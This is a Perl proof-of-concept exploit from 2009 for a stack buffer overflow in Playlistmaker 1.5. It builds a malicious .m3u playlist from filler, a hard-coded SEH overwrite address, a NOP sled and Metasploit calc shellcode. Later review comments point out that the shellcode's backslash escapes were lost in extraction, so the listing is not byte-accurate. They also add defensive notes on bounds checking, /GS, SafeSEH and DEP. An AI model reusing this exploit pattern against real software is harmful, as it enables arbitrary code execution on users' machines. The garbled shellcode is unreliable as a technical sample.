
# Title : Playlistmaker 1.5 (.M3U/M3L File) Local Stack Overflow Exploit (seh)
# Published : 2009-08-06
# Author : germaya_x


#!/usr/bin/perl
#discovered by:  germaya_x
#soft:Playlistmaker1.5 (m3l,m3u files) local buffer overflow exploit (SEH)
#Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html
#tested on: xp sp3 (EN)
#bug date:August 06 09
#greetz:hack4love ,devil fucker ,angel
###############################################################################################
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Proof-of-concept file generator: builds one long string and writes it to
# radio.m3u, a playlist file for the application named in the header.
#
# Payload string, built by concatenating ten literals. Per the generator
# comment above it is Metasploit's win32_exec with CMD=calc, i.e. a
# demonstration payload.
# NOTE(review): as listed, these literals contain no backslash escapes, so Perl
# treats them as plain ASCII text ("x31xc9...") and the result does not match
# the stated Size=160. The backslashes were presumably lost when the page was
# extracted; treat the listing as a record of the report, not a byte-accurate sample.
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38".
"x78x73x8ax83xebxfcxe2xf4xc4x90x37x8ax38x78xf8xcf".
"x04xf3x0fx8fx40x79x9cx01x77x60xf8xd5x18x79x98xc3".
"xb3x4cxf8x8bxd6x49xb3x13x94xfcxb3xfex3fxb9xb9x87".
"x39xbax98x7ex03x2cx57x8ex4dx9dxf8xd5x1cx79x98xec".
"xb3x74x38x01x67x64x72x61xb3x64xf8x8bxd3xf1x2fxae".
"x3cxbbx42x4ax5cxf3x33xbaxbdxb8x0bx86xb3x38x7fx01".
"x48x64xdex01x50x70x98x83xb3xf8xc3x8ax38x78xf8xe2".
"x04x27x42x7cx58x2exfax72xbbxb8x08xdax50x88xf9x8e".
"x67x10xebx74xb2x76x24x75xdfx1bx12xe6x5bx78x73x8a";
# 992 filler characters placed ahead of the control value below.
my $bof="A" x 992;
# Hard-coded four-value constant written straight after the filler.
# NOTE(review): presumably an address tied to the tested platform ("xp sp3 (EN)"
# in the header), so not expected to hold on other builds - confirm.
my $eip_next="x33xBFx96x7C"; #
# Padding: the literal "x90" repeated 20 times.
my $nop="x90" x 20;

################################################################################################
# Writes filler + constant + padding + payload as one unterminated line.
# NOTE(review): '>>' opens in append mode, so an existing radio.m3u is extended
# rather than replaced. The handle is a bareword and the return values of
# open/print/close are not checked, so a failed write goes unreported.
# NOTE(review): defensive takeaways for this bug class - a playlist parser should
# bound-check entry length before copying it into a fixed stack buffer; building
# with /GS and /SAFESEH and enabling DEP/SEHOP where the OS supports them raises
# the bar. A playlist entry of roughly a kilobyte with no path structure is a
# reasonable triage signal for files like this one.
open(MYFILE,'>>radio.m3u');
print MYFILE $bof.$eip_next.$nop.$shellcode;
close(MYFILE);
################################################################################################
